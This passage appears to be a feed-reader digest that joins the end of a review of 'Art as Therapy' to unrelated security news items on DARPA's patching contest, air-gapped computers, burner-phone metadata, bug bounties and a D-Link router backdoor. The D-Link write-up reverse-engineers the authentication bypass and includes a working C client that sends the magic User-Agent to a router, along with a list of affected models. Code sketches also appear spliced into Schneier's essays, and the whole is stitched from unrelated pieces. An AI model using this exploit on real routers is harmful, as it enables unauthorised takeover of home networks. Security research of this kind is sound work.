Given the profound flaws of our memory and the unreliability of its self-revision, it’s unsurprising that the fear of forgetting — forgetting specific details about people and places, but also forgetting all the minute, mundane building blocks that fuse together into the general wholeness of who we are — would be an enormous source of distress for us. Since both memory and art are as much about what is being left out as about what is being spotlighted, de Botton and Armstrong argue that art offers an antidote to this unease:

What we’re worried about forgetting … tends to be quite particular. It isn’t just anything about a person or scene that’s at stake; we want to remember what really matters, and the people we call good artists are, in part, the ones who appear to have made the right choices about what to communicate and what to leave out. … We might say that good artwork pins down the core of significance, while its bad counterpart, although undeniably reminding us of something, lets an essence slip away. It is an empty souvenir.

'We don't just observe her, we get to know what is important about her.' Johannes Vermeer, 'Woman in Blue Reading a Letter' (1663).

Art, then, is not only what rests in the frame, but is itself a frame for experience:

Art is a way of preserving experiences, of which there are many transient and beautiful examples, and that we need help containing.

2. HOPE

Our conflicted relationship with beauty presents a peculiar paradox: The most universally admired art is of the “pretty” kind — depictions of cheerful and pleasant scenes, faces, objects, and situations — yet “serious” art critics and connoisseurs see it as a failure of taste and of intelligence. (Per Susan Sontag’s memorable definition, the two are inextricably intertwined anyway: “Intelligence … is really a kind of taste: taste in ideas.”) De Botton and Armstrong consider the implications:

The love of prettiness is often deemed a low, even a “bad” response, but because it is so dominant and widespread it deserves attention, and may hold important clues about a key function of art. … The worries about prettiness are twofold. Firstly, pretty pictures are alleged to feed sentimentality. Sentimentality is a symptom of insufficient engagement with complexity, by which one really means problems. The pretty picture seems to suggest that in order to make life nice, one merely has to brighten up the apartment with a depiction of some flowers. If we were to ask the picture what is wrong with the world, it might be taken as saying ‘you don’t have enough Japanese water gardens’ — a response that appears to ignore all the more urgent problems that confront humanity. . . . . The very innocence and simplicity of the picture seems to militate against any attempt to improve life as a whole. Secondly, there is the related fear that prettiness will numb us and leave us insufficiently critical and alert to the injustices surrounding us.

But these worries, they argue, are misguided. Optimism, rather than a failure of intelligence, is a critical cognitive and psychoemotional skill in our quest to live well — something even neuroscience has indicated — and hope, its chariot, is something to cherish, not condemn:

Cheerfulness is an achievement, and hope is something to celebrate. If optimism is important, it’s because many outcomes are determined by how much of it we bring to the task. It is an important ingredient of success. This flies in the face of the elite view that talent is the primary requirement of a good life, but in many cases the difference between success and failure is determined by nothing more than our sense of what is possible and the energy we can muster to convince others of our due. We might be doomed not by a lack of skill, but by an absence of hope.

Put simply and poignantly, it pays to “imagine immensities.”

'What hope might look like.' Henri Matisse, 'Dance' (II), 1909.

They offer an example:

The dancers in Matisse’s painting are not in denial of the troubles of this planet, but from the standpoint of our imperfect and conflicted — but ordinary — relationship with reality, we can look to their attitude for encouragement. They put us in touch with a blithe, carefree part of ourselves that can help us cope with inevitable rejections and humiliations. The picture does not suggest that all is well, any more than it suggests that women always delight in each other’s existence and bond together in mutually supportive networks.

And so we return to why prettiness sings to us:

The more difficult our lives, the more a graceful depiction of a flower might move us. The tears — if they come — are in response not to how sad the image is, but how pretty.

[…]

We should be able to enjoy an ideal image without regarding it as a false picture of how things usually are. A beautiful, though partial, vision can be all the more precious to us because we are so aware of how rarely life satisfies our desires.

3. SORROW

Since we’re creatures of infinite inner contradiction, art can help us be more whole not only by expanding our capacity for positive emotions but also by helping us to fully inhabit and metabolize the negative — and by doing so with dignity and by reminding us “of the legitimate place of sorrow in a good life”:

One of the unexpectedly important things that art can do for us is teach us how to suffer more successfully. … We can see a great deal of artistic achievement as “sublimated” sorrow on the part of the artist, and in turn, in its reception, on the part of the audience. The term sublimation derives from chemistry. It names the process by which a solid substance is directly transformed into a gas, without first becoming liquid. In art, sublimation refers to the psychological processes of transformation, in which base and unimpressive experiences are converted into something noble and fine — exactly what may happen when sorrow meets art.

'Sublimation: the transformation of suffering into beauty.' Nan Goldin, 'Siobhan in My Mirror' (1992).

Above all, de Botton and Armstrong argue, art helps us feel less alone in our suffering, to which the social expression of our private sorrows lends a kind of affirmative dignity. They offer an example in the work of photographer Nan Goldin, who explored the lives of the queer community with equal parts curiosity and respect long before champions like Andrew Sullivan first pulled the politics of homosexuality into the limelight of mainstream cultural discourse:

Until far too recently, homosexuality lay largely outside the province of art. In Nan Goldin’s work, it is, redemptively, one of its central themes. Goldin’s art is filled with a generous attentiveness towards the lives of its subjects. Although we might not be conscious of it at first, her photograph of a young and, as we discern, lesbian woman examining herself in the mirror is composed with utmost care. The device of reflection is key. In the room itself the woman is out of focus; we don’t see her directly, just the side of her face and the blur of a hand. The accent is on the make-up she has just been using. It is in the mirror that we see her as she wants to be seen: striking and stylish, her hand suave and eloquent. The work of art functions like a kindly voice that says, “I see you as you hope to be seen, I see you as worthy of love.” The photograph understands the longing to become a more polished and elegant version of oneself. It sounds, of course, an entirely obvious wish; but for centuries, partly because there were no Goldins, it was anything but.

Therein, they argue, lies one of art’s greatest gifts:

Art can offer a grand and serious vantage point from which to survey the travails of our condition.

4. REBALANCING

With our fluid selves, clusters of tormenting contradictions, and culture of prioritizing productivity over presence, no wonder we find ourselves in need of recentering. That’s precisely what art can offer:

Few of us are entirely well balanced. Our psychological histories, relationships and working routines mean that our emotions can incline grievously in one direction or another. We may, for example, have a tendency to be too complacent, or too insecure; too trusting, or too suspicious; too serious, or too light-hearted. Art can put us in touch with concentrated doses of our missing dispositions, and thereby restore a measure of equilibrium to our listing inner selves.

This function of art also helps explain the vast diversity of our aesthetic preferences — because our individual imbalances differ, so do the artworks we seek out to soothe them:

Why are some people drawn to minimalist architecture and others to Baroque? Why are some people excited by bare concrete walls and others by William Morris’s floral patterns? Our tastes will depend on what spectrum of our emotional make-up lies in shadow and is hence in need of stimulation and emphasis. Every work of art is imbued with a particular psychological and moral atmosphere: a painting may be either serene or restless, courageous or careful, modest or confident, masculine or feminine, bourgeois or aristocratic, and our preferences for one kind over another reflect our varied psychological gaps. We hunger for artworks that will compensate for our inner fragilities and help return us to a viable mean. We call a work beautiful when it supplies the virtues we are missing, and we dismiss as ugly one that forces on us moods or motifs that we feel either threatened or already overwhelmed by. Art holds out the promise of inner wholeness.

Viewing art from this perspective, de Botton and Armstrong argue, also affords us the necessary self-awareness to understand why we might respond negatively to a piece of art — an insight that might prevent us from reactive disparagement. Being able to recognize what someone lacks in order to find an artwork beautiful allows us to embody that essential practice of prioritizing understanding over self-righteousness. In this respect, art is also a tuning — and atoning — mechanism for our moral virtues. In fact, some of history’s most celebrated art is anchored on moralistic missions — what de Botton and Armstrong call “an attempt to encourage our better selves through coded messages of exhortation and admonition” — to which we often respond with resistance and indignation. But such reactions miss the bigger point:

We might think of works of art that exhort as both bossy and unnecessary, but this would assume an encouragement of virtue would always be contrary to our own desires. However, in reality, when we are calm and not under fire, most of us long to be good and wouldn’t mind the odd reminder to be so; we simply can’t find the motivation day to day. In relation to our aspirations to goodness, we suffer from what Aristotle called akrasia, or weakness of will. We want to behave well in our relationships, but slip up under pressure. We want to make more of ourselves, but lose motivation at a critical juncture. In these circumstances, we can derive enormous benefit from works of art that encourage us to be the best versions of ourselves, something that we would only resent if we had a manic fear of outside intervention, or thought of ourselves as perfect already.

The best kind of cautionary art — art that is moral without being “moralistic” — understands how easy it is to be attracted to the wrong things.

[…]

The task for artists, therefore, is to find new ways of prying open our eyes to tiresomely familiar, but critically important, ideas about how to lead a balanced and good life.

'A reason to say sorry.' Eve Arnold, 'Divorce in Moscow' (1966).

They summarize this function of art beautifully:

Art can save us time — and save our lives — through opportune and visceral reminders of balance and goodness that we should never presume we know enough about already.

5. SELF-UNDERSTANDING

Despite our best efforts at self-awareness, we’re all too often partial or complete mysteries to ourselves. Art, de Botton and Armstrong suggest, can help shed light on those least explored nooks of our psyche and make palpable the hunches of intuition we can only sense but not articulate:

We are not transparent to ourselves. We have intuitions, suspicions, hunches, vague musings, and strangely mixed emotions, all of which resist simple definition. We have moods, but we don’t really know them. Then, from time to time, we encounter works of art that seem to latch on to something we have felt but never recognized clearly before. Alexander Pope identified a central function of poetry as taking thoughts we experience half-formed and giving them clear expression: “what was often thought, but ne’er so well expressed.” In other words, a fugitive and elusive part of our own thinking, our own experience, is taken up, edited, and returned to us better than it was before, so that we feel, at last, that we know ourselves more clearly.

More than that, they argue, the self-knowledge art bequeaths gives us a language for communicating that to others — something that explains why we are so particular about the kinds of art with which we surround ourselves publicly, a sort of self-packaging we all practice as much on the walls of our homes as we do on our Facebook walls and art Tumblrs. While the cynic might interpret this as mere showing off, however, de Botton and Armstrong peel away this superficial interpretation to reveal the deeper psychological motive — our desire to communicate to others the subtleties of who we are and what we believe in a way that words might never fully capture.

6. GROWTH

Besides inviting deeper knowledge of our own selves, art also allows us to expand the boundaries of who we are by helping us overcome our chronic fear of the unfamiliar and living more richly by inviting the unknown:

Engagement with art is useful because it presents us with powerful examples of the kind of alien material that provokes defensive boredom and fear, and allows us time and privacy to learn to deal more strategically with it. An important first step in overcoming defensiveness around art is to become more open about the strangeness that we feel in certain contexts.

De Botton and Armstrong propose three critical steps to overcoming our defensiveness around art: First, acknowledging the strangeness we feel and being gentle on ourselves for feeling it, recognizing that it’s completely natural — after all, so much art comes from people with worldviews radically different from, and often contradictory to, our own; second, making ourselves familiar and thus more at home with the very minds who created that alien art; finally, looking for points of connection with the artist, “however fragile and initially tenuous,” so we can relate to the work that sprang from the context of their life with the personal reality of our own context.

7. APPRECIATION

Our attention, as we know, is “an intentional, unapologetic discriminator” that blinds us to so much of what is around us and to the magic in our familiar surroundings. Art, de Botton and Armstrong argue, can lift these blinders so we can truly absorb not just what we’re expecting to see, but also what we aren’t:

One of our major flaws, and causes of unhappiness, is that we find it hard to take note of what is always around us. We suffer because we lose sight of the value of what is before us and yearn, often unfairly, for the imagined attraction elsewhere.

While habit can be a remarkable life-centering force, it is also a double-edged sword that can slice off a whole range of experiences as we fall into autopilot mode. Art can decondition our habituation to what is wonderful and worthy of rejoicing:

Art is one resource that can lead us back to a more accurate assessment of what is valuable by working against habit and inviting us to recalibrate what we admire or love.

'Paying attention to ordinary life.' Jasper Johns, 'Painted Bronze' (1960).

One example they offer comes from Jasper Johns’s famous bronze-cast beer cans, which nudge us to look at a mundane and familiar object with new eyes:

The heavy, costly material they are made of makes us newly aware of their separateness and oddity: we see them as though we had never laid eyes on cans before, acknowledging their intriguing identities as a child or a Martian, both free of habit in this area, might naturally do.

Johns is teaching us a lesson: how to look with kinder and more alert eyes at the world around us.

Such is the power of art: It is both witness to and celebrator of the value of the ordinary, which we so frequently forsake in our quests for artificial greatness, a kind of resensitization tool that awakens us to the richness of our daily lives:

[Art] can teach us to be more just towards ourselves as we endeavor to make the best of our circumstances: a job we do not always love, the imperfections of middle age, our frustrated ambitions and our attempts to stay loyal to irritable but loved spouses. Art can do the opposite of glamorizing the unattainable; it can reawaken us to the genuine merit of life as we’re forced to lead it.

The rest of Art as Therapy goes on to examine such eternal questions as what makes good art, what kind of art one should make, how art should be displayed, studied, bought and sold, and a heartening wealth more. Complement it with 100 ideas that changed art.


25 Oct 08:23

DARPA Contest to Pay $2M for Automated Network Defense, Patching

by Michael Mimoso

The bug bounty continues to be turned on its ear.

Microsoft began the wave of paying premium money for mitigation technologies via its Blue Hat prizes, and now DARPA has gone all-in to the tune of $2 million for the development of an automated network defense system that not only scans for and identifies vulnerabilities, but patches them on the fly.

The Cyber Grand Challenge was announced today and DARPA officials said they plan on holding qualifying events where teams of experts would compete for a spot in the final competition to be held in 2016.

“Today, our time to patch a newly discovered security flaw is measured in days,” said Mike Walker, DARPA program manager. “Through automatic recognition and remediation of software flaws, the term for a new cyberattack may change from zero-day to zero-second.”

Competitors will be tasked with building an unmanned system that will go up against other similar systems looking for, and patching, critical vulnerabilities.

“The growth trends we’ve seen in cyberattacks and malware point to a future where automation must be developed to assist IT security analysts,” said Dan Kaufman, DARPA’s Information Innovation Office director.

The competition is expected to be carried out in stages, starting with qualifying events where teams of security and networking experts specializing in reverse engineering and program analysis would build systems that automatically analyze a software package for vulnerabilities. Teams that automatically identify, analyze and patch the bug in question would move on to the final, DARPA said in a statement.

DARPA will score entries on how well systems protect hosts, identify flaws and keep software running. First prize is $2 million, with the runner-up getting $1 million and third place receiving $750,000.

“Competitors can choose one of two routes: an unfunded track in which anyone capable of fielding a capable system can participate, and a funded track in which DARPA awards contracts to organizations presenting the most compelling proposals,” DARPA said in a statement.

The competition, DARPA said, emerged out of the continued failure of signature-based defenses and the limitations of semi-automated approaches such as static analysis, fuzzing and data flow tracking.

“A competitor will improve and combine these semiautomated technologies into an unmanned cyber reasoning system that can autonomously reason about novel program flaws, prove the existence of flaws in networked applications and formulate effective defenses,” DARPA said in its broad agency announcement. “Human analysts develop these signatures through a process of reasoning about software. In fully autonomous defense, a cyber system capable of reasoning about software will create its own knowledge, autonomously emitting and using knowledge quanta such as vulnerability scanner signatures, intrusion detection signatures, and security patches.”

23 Oct 08:14

DARPA slaps $2m on the bar for the ULTIMATE security bug SLAYER

by Iain Thomson

Brown trousers time for some in antivirus industry

It's a bad day for the vulnerability scanning industry: DARPA has announced a new multi-million-dollar competition to build a system that will be able to automatically analyze code, find its weak spots, and patch them against attack.…

22 Oct 19:09

Blackhole Exploit Kit Use Falls Off After Arrest

by Brian Prince

Two weeks ago, it was reported that police in Russia arrested the reputed author of the Blackhole Exploit Kit, a man who went by the hacker alias 'Paunch.' In the aftermath, the number of spam campaigns using Blackhole to distribute malware fell off, and in the two weeks since it has still not recovered.


19 Oct 14:32

Air Gaps

by schneier

Since I started working with Snowden's documents, I have been using a number of tools to try to stay secure from the NSA. The advice I shared included using Tor, preferring certain cryptography over others, and using public-domain encryption wherever possible.

I also recommended using an air gap, which physically isolates a computer or local network of computers from the Internet. (The name comes from the literal gap of air between the computer and the Internet; the word predates wireless networks.)

But this is more complicated than it sounds, and requires explanation.

Since we know that computers connected to the Internet are vulnerable to outside hacking, an air gap should protect against those attacks. There are a lot of systems that use -- or should use -- air gaps: classified military networks, nuclear power plant controls, medical equipment, avionics, and so on.

Osama Bin Laden used one. I hope human rights organizations in repressive countries are doing the same.

Air gaps might be conceptually simple, but they're hard to maintain in practice. The truth is that nobody wants a computer that never receives files from the Internet and never sends files out into the Internet. What they want is a computer that's not directly connected to the Internet, albeit with some secure way of moving files on and off.

But every time a file moves back or forth, there's the potential for attack.

And air gaps have been breached. Stuxnet was a US and Israeli military-grade piece of malware that attacked the Natanz nuclear plant in Iran. It successfully jumped the air gap and penetrated the Natanz network. Another piece of malware named agent.btz, probably Russian in origin, successfully jumped the air gap protecting US military networks.

These attacks work by exploiting security vulnerabilities in the removable media used to transfer files on and off the air-gapped computers.

Since working with Snowden's NSA files, I have tried to maintain a single air-gapped computer. It turned out to be harder than I expected, and I have ten rules for anyone trying to do the same:

1. When you set up your computer, connect it to the Internet as little as possible. It's impossible to completely avoid connecting the computer to the Internet, but try to configure it all at once and as anonymously as possible. I purchased my computer off-the-shelf in a big box store, then went to a friend's network and downloaded everything I needed in a single session. (The ultra-paranoid way to do this is to buy two identical computers, configure one using the above method, upload the results to a cloud-based anti-virus checker, and transfer the results of that to the air gap machine using a one-way process.)

2. Install the minimum software set you need to do your job, and disable all operating system services that you won't need. The less software you install, the less an attacker has available to exploit. I downloaded and installed OpenOffice, a PDF reader, a text editor, TrueCrypt, and BleachBit. That's all. (No, I don't have any inside knowledge about TrueCrypt, and there's a lot about it that makes me suspicious. But for Windows full-disk encryption it's that, Microsoft's BitLocker, or Symantec's PGPDisk -- and I am more worried about large US corporations being pressured by the NSA than I am about TrueCrypt.)

3. Once you have your computer configured, never directly connect it to the Internet again. Consider physically disabling the wireless capability, so it doesn't get turned on by accident.

4. If you need to install new software, download it anonymously from a random network, put it on some removable media, and then manually transfer it to the air-gapped computer. This is by no means perfect, but it's an attempt to make it harder for the attacker to target your computer.

5. Turn off all autorun features. This should be standard practice for all the computers you own, but it's especially important for an air-gapped computer. Agent.btz used autorun to infect US military computers.

6. Minimize the amount of executable code you move onto the air-gapped computer. Text files are best. Microsoft Office files and PDFs are more dangerous, since they might have embedded macros. Turn off all macro capabilities you can on the air-gapped computer. Don't worry too much about patching your system; in general, the risk of the executable code is worse than the risk of not having your patches up to date. You're not on the Internet, after all.

7. Only use trusted media to move files on and off air-gapped computers. A USB stick you purchase from a store is safer than one given to you by someone you don't know -- or one you find in a parking lot.

8. For file transfer, a writable optical disk (CD or DVD) is safer than a USB stick. Malware can silently write data to a USB stick, but it can't spin the CD-R up to 1000 rpm without your noticing. This means that the malware can only write to the disk when you write to the disk. You can also verify how much data has been written to the CD by physically checking the back of it. If you've only written one file, but it looks like three-quarters of the CD was burned, you have a problem. Note: the first company to market a USB stick with a light that indicates a write operation -- not read or write; I've got one of those -- wins a prize.

9. When moving files on and off your air-gapped computer, use the absolute smallest storage device you can. And fill up the entire device with random files; a minimal sketch of that filling step follows this list. If an air-gapped computer is compromised, the malware is going to try to sneak data off it using that media. While malware can easily hide stolen files from you, it can't break the laws of physics. So if you use a tiny transfer device, it can only steal a very small amount of data at a time. If you use a large device, it can take that much more. Business-card-sized mini-CDs can have capacity as low as 30 MB. I still see 1-GB USB sticks for sale.

10. Consider encrypting everything you move on and off the air-gapped computer. Sometimes you'll be moving public files and it won't matter, but sometimes you won't be, and it will. And if you're using optical media, those disks will be impossible to erase. Strong encryption solves these problems. And don't forget to encrypt the computer as well; whole-disk encryption is the best.
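Here is a minimal sketch of the filling step from rule 9, assuming a Unix-like system and a transfer device mounted at /media/transfer (the mount point is an assumption; adjust it for your setup). It keeps creating files of random bytes until the device refuses to take any more:

#include <stdio.h>

#define CHUNK     (64 * 1024)
#define FILE_SIZE (16 * 1024 * 1024)     /* 16 MB per filler file */

int main(void)
{
    const char *mount = "/media/transfer";   /* assumed mount point of the stick */
    unsigned char buf[CHUNK];
    char path[4096];
    int full = 0;

    FILE *urandom = fopen("/dev/urandom", "rb");
    if (urandom == NULL) {
        perror("/dev/urandom");
        return 1;
    }

    /* Keep creating files of random bytes until a create or write fails,
     * which on a healthy device means there is no free space left. */
    for (int i = 0; !full; i++) {
        snprintf(path, sizeof(path), "%s/filler_%04d.bin", mount, i);
        FILE *out = fopen(path, "wb");
        if (out == NULL) {
            full = 1;
            break;
        }
        long written = 0;
        while (written < FILE_SIZE) {
            if (fread(buf, 1, CHUNK, urandom) != CHUNK) {
                full = 1;                    /* urandom should not run dry; stop anyway */
                break;
            }
            if (fwrite(buf, 1, CHUNK, out) != CHUNK || fflush(out) != 0) {
                full = 1;                    /* no space left on device */
                break;
            }
            written += CHUNK;
        }
        fclose(out);
    }

    fclose(urandom);
    printf("transfer device filled with random data\n");
    return 0;
}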

One thing I didn't do, although it's worth considering, is use a stateless operating system like Tails. You can configure Tails with a persistent volume to save your data, but no operating system changes are ever saved. Booting Tails from a read-only DVD -- you can keep your data on an encrypted USB stick -- is even more secure. Of course, this is not foolproof, but it greatly reduces the potential avenues for attack.

Yes, all this is advice for the paranoid. And it's probably impossible to enforce for any network more complicated than a single computer with a single user. But if you're thinking about setting up an air-gapped computer, you already believe that some very powerful attackers are after you personally. If you're going to use an air gap, use it properly.

Of course you can take things further. I have met people who have physically removed the camera, microphone, and wireless capability altogether. But that's too much paranoia for me right now.

This essay previously appeared on Wired.com.

EDITED TO ADD: Yes, I am ignoring TEMPEST attacks. I am also ignoring black bag attacks against my home.

19 Oct 14:25

Fingerprinting Burner Phones

by schneier

In one of the documents recently released by the NSA as a result of an EFF lawsuit, there's discussion of a specific capability of a call records database to identify disposable "burner" phones.

Let’s consider, then, the very specific data this query tool was designed to return: The times and dates of the first and last call events, but apparently not the times and dates of calls between those endpoints. In other words, this tool is supporting analytic software that only cares when a phone went online, and when it stopped being used. It also gets the total number of calls, and the ratio of unique contacts to calls, but not the specific numbers contacted. Why, exactly, would this limited set of information be useful? And why, in particular, might you want to compare that information across a large number of phones there’s not yet any particular reason to suspect?

One possibility that jumps out at me -- and perhaps anyone else who’s a fan of The Wire -- is that this is the kind of information you would want if you were trying to identify disposable prepaid “burner” phones being used by a target who routinely cycles through cell phones as a countersurveillance tactic. The number of unique contacts and call/contact ratio would act as a kind of rough fingerprint -- you’d assume a phone being used for dedicated clandestine purposes to be fairly consistent on that score -- while the first/last call dates help build a timeline: You’re looking for a series of phones that are used for a standard amount of time, and then go dead just as the next phone goes online.

Consider this another illustration of the value of metadata.
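To make the idea concrete, here is a minimal sketch of the kind of per-phone fingerprint described above: first and last call events, total calls, and the ratio of unique contacts to calls. The record layout and the toy data are illustrative assumptions, not anything taken from the released document:

#include <stdio.h>
#include <string.h>

/* Hypothetical call detail record for a single phone. */
struct call_record {
    long timestamp;          /* seconds since epoch */
    const char *contact;     /* number called */
};

int main(void)
{
    /* Toy data standing in for one phone's call records. */
    struct call_record calls[] = {
        { 1370000000, "555-0101" },
        { 1370050000, "555-0101" },
        { 1370100000, "555-0199" },
        { 1370200000, "555-0101" },
    };
    int total = sizeof(calls) / sizeof(calls[0]);

    long first = calls[0].timestamp, last = calls[0].timestamp;
    int unique = 0;

    for (int i = 0; i < total; i++) {
        if (calls[i].timestamp < first) first = calls[i].timestamp;
        if (calls[i].timestamp > last)  last  = calls[i].timestamp;

        /* Count a contact as unique if it hasn't appeared earlier in the list. */
        int seen = 0;
        for (int j = 0; j < i; j++) {
            if (strcmp(calls[j].contact, calls[i].contact) == 0) { seen = 1; break; }
        }
        if (!seen) unique++;
    }

    /* A dedicated clandestine phone tends to have a stable ratio and a short,
     * well-defined first-to-last window; matching a chain of such phones is
     * then a matter of lining these windows up end to end. */
    printf("first=%ld last=%ld calls=%d unique=%d ratio=%.2f\n",
           first, last, total, unique, (double)unique / total);
    return 0;
}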

14 Oct 19:16

Reverse Engineering a D-Link Backdoor

by Craig

All right. It’s Saturday night, I have no date, a two-liter bottle of Shasta and my all-Rush mix-tape…let’s hack.

On a whim I downloaded firmware v1.13 for the DIR-100 revA. Binwalk quickly found and extracted a SquashFS file system, and soon I had the firmware’s web server (/bin/webs) loaded into IDA:

Strings inside /bin/webs

Based on the above strings listing, the /bin/webs binary is a modified version of thttpd which provides the administrative interface for the router. It appears to have been modified by Alphanetworks (a spin-off of D-Link). They were even thoughtful enough to prepend many of their custom function names with the string “alpha”:

Alphanetworks' custom functions

The alpha_auth_check function sounds interesting!

This function is called from a couple different locations, most notably from alpha_httpd_parse_request:

Function call to alpha_auth_check

We can see that alpha_auth_check is passed one argument (whatever is stored in register $s2); if alpha_auth_check returns -1 (0xFFFFFFFF), the code jumps to the end of alpha_httpd_parse_request, otherwise it continues processing the request.

Some further examination of the use of register $s2 prior to the alpha_auth_check call indicates that it is a pointer to a data structure which contains char* pointers to various pieces of the received HTTP request, such as HTTP headers and the requested URL:

$s2 is a pointer to a data structure

We can now define a function prototype for alpha_auth_check and begin to enumerate elements of the data structure:

struct http_request_t
{
    char unknown[0xB8];
    char *url; // At offset 0xB8 into the data structure
};

int alpha_auth_check(struct http_request_t *request);

alpha_auth_check itself is a fairly simple function. It does a few strstr’s and strcmp’s against some pointers in the http_request_t structure, then calls check_login, which actually does the authentication check. If the calls to any of the strstr’s / strcmp’s or check_login succeed, it returns 1; else, it redirects the browser to the login page and returns -1:

alpha_auth_check code snippet

Those strstr’s look interesting. They take the requested URL (at offset 0xB8 into the http_request_t data structure, as previously noted) and check to see if it contains the strings “graphic/” or “public/”. These are sub-directories under the device’s web directory, and if the requested URL contains one of those strings, then the request is allowed without authentication.

It is the final strcmp, however, that proves a bit more compelling:

An interesting string comparison in alpha_auth_check

This is performing a strcmp between the string pointer at offset 0xD0 inside the http_request_t structure and the string “xmlset_roodkcableoj28840ybtide”; if the strings match, the check_login function call is skipped and alpha_auth_check returns 1 (authentication OK).

A quick Google for the “xmlset_roodkcableoj28840ybtide” string turns up only a single Russian forum post from a few years ago, which notes that this is an “interesting line” inside the /bin/webs binary. I’d have to agree.

So what is this mystery string getting compared against? If we look back in the call tree, we see that the http_request_t structure pointer is passed around by a few functions:

Call graph

It turns out that the pointer at offset 0xD0 in the http_request_t structure is populated by the httpd_parse_request function:

Checks for the User-Agent HTTP header

Populates http_request_t + 0xD0 with a pointer to the User-Agent header string

This code is effectively:

/* If this header line starts with "User-Agent:", store a pointer to its value
   (skipping any spaces/tabs after the colon) at offset 0xD0 in the request struct. */
if(strncasecmp(header, "User-Agent:", strlen("User-Agent:")) == 0)
{
    http_request_t->0xD0 = header + strlen("User-Agent:")
                         + strspn(header + strlen("User-Agent:"), " \t");
}

Knowing that offset 0xD0 in http_request_t contains a pointer to the User-Agent header, we can now re-construct the alpha_auth_check function:

#define AUTH_OK 1
#define AUTH_FAIL -1

int alpha_auth_check(struct http_request_t *request)
{
    if(strstr(request->url, "graphic/") ||
       strstr(request->url, "public/") ||
       strcmp(request->user_agent, "xmlset_roodkcableoj28840ybtide") == 0)
    {
        return AUTH_OK;
    }
    else
    {
        // These arguments are probably user/pass or session info
        if(check_login(request->0xC, request->0xE0) != 0)
        {
            return AUTH_OK;
        }
    }

    return AUTH_FAIL;
}

In other words, if your browser’s user agent string is “xmlset_roodkcableoj28840ybtide” (no quotes), you can access the web interface without any authentication and view/change the device settings (a DI-524UP is shown, as I don’t have a DIR-100 and the DI-524UP uses the same firmware):

Accessing the admin page of a DI-524UP
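If you want to check a device you own, a minimal sketch along these lines sends a raw HTTP request carrying the magic User-Agent and prints the response. The router address is an assumption; on an affected device the response is the admin page rather than a redirect to the login page:

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/socket.h>

int main(void)
{
    const char *router_ip = "192.168.0.1";          /* assumed LAN address of the router */
    const char *request =
        "GET / HTTP/1.1\r\n"
        "Host: 192.168.0.1\r\n"
        "User-Agent: xmlset_roodkcableoj28840ybtide\r\n"
        "Connection: close\r\n\r\n";
    char response[4096];
    ssize_t n;

    int sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror("socket");
        return 1;
    }

    struct sockaddr_in addr = { .sin_family = AF_INET, .sin_port = htons(80) };
    inet_pton(AF_INET, router_ip, &addr.sin_addr);

    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) != 0) {
        perror("connect");
        return 1;
    }
    write(sock, request, strlen(request));

    /* On an affected firmware build, the body below is the admin interface
     * rather than a redirect to the login page. */
    while ((n = read(sock, response, sizeof(response) - 1)) > 0) {
        response[n] = '\0';
        fputs(response, stdout);
    }
    close(sock);
    return 0;
}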

Based on the source code of the HTML pages and some Shodan search results, it can be reasonably concluded that the following D-Link devices are likely affected:

  • DIR-100
  • DIR-120
  • DI-624S
  • DI-524UP
  • DI-604S
  • DI-604UP
  • DI-604+
  • TM-G5240

Additionally, several Planex routers also appear to use the same firmware:

  • BRL-04R
  • BRL-04UR
  • BRL-04CW

You stay classy, D-Link.

UPDATE:

The ever neighborly Travis Goodspeed pointed out that this backdoor is used by the /bin/xmlsetc binary in the D-Link firmware. After some grepping, I found several binaries that appear to use xmlsetc to automatically re-configure the device’s settings (example: dynamic DNS). My guess is that the developers realized that some programs/services needed to be able to change the device’s settings automatically; realizing that the web server already had all the code to change these settings, they decided to just send requests to the web server whenever they needed to change something. The only problem was that the web server required a username and password, which the end user could change. Then, in a eureka moment, Joel jumped up and said, “Don’t worry, for I have a cunning plan!”.

Also, several people have reported in the comments that some versions of the DIR-615 are also affected, including those distributed by Virgin Mobile. I have not yet verified this, but it seems quite reasonable.

UPDATE #2:

Arbitrary code execution is also possible, thanks to the backdoor. Proof of concept.

11 Oct 18:04

Going beyond vulnerability rewards

by lcamtuf
Posted by Michal Zalewski, Google Security Team

We all benefit from the amazing volunteer work done by the open source community. That’s why we keep asking ourselves how to take the model pioneered with our Vulnerability Reward Program - and employ it to improve the security of key third-party software critical to the health of the entire Internet.

We thought about simply kicking off an OSS bug-hunting program, but this approach can easily backfire. In addition to valid reports, bug bounties invite a significant volume of spurious traffic - enough to completely overwhelm a small community of volunteers. On top of this, fixing a problem often requires more effort than finding it.

So we decided to try something new: provide financial incentives for down-to-earth, proactive improvements that go beyond merely fixing a known security bug. Whether you want to switch to a more secure allocator, to add privilege separation, to clean up a bunch of sketchy calls to strcat(), or even just to enable ASLR - we want to help!

We intend to roll out the program gradually, based on the quality of the received submissions and the feedback from the developer community. For the initial run, we decided to limit the scope to the following projects:

  • Core infrastructure network services: OpenSSH, BIND, ISC DHCP
  • Core infrastructure image parsers: libjpeg, libjpeg-turbo, libpng, giflib
  • Open-source foundations of Google Chrome: Chromium, Blink
  • Other high-impact libraries: OpenSSL, zlib
  • Security-critical, commonly used components of the Linux kernel (including KVM)

We intend to soon extend the program to:

  • Widely used web servers: Apache httpd, lighttpd, nginx
  • Popular SMTP services: Sendmail, Postfix, Exim
  • Toolchain security improvements for GCC, binutils, and llvm
  • Virtual private networking: OpenVPN

How to participate?

Please submit your patches directly to the maintainers of the individual projects. Once your patch is accepted and merged into the repository, please send all the relevant details to security-patches@google.com. If we think that the submission has a demonstrable, positive impact on the security of the project, you will qualify for a reward ranging from $500 to $3,133.7.

Before participating, please read the official rules posted on this page; the document provides additional information about eligibility, rewards, and other important stuff.

Happy patching!

09 Oct 19:41

Researchers Nab $28k in Microsoft Bug Bounty Program

by Dennis Fisher

As part of its first-ever bounty program, Microsoft has paid out $28,000 to a small group of researchers who identified and reported vulnerabilities in Internet Explorer 11. The IE 11 bounty program only ran for one month during the summer, but it attracted a number of submissions from well-known researchers.

The Microsoft bug bounty program for IE 11 began in June and ended in late July, during the preview period for the browser. Researchers who reported vulnerabilities in the latest version of the company’s browser had the opportunity to earn as much as $11,000. None of the submissions reached that maximum; the highest payment was $9,400 to James Forshaw, for four vulnerabilities discovered in IE plus a bonus for finding some IE design vulnerabilities.

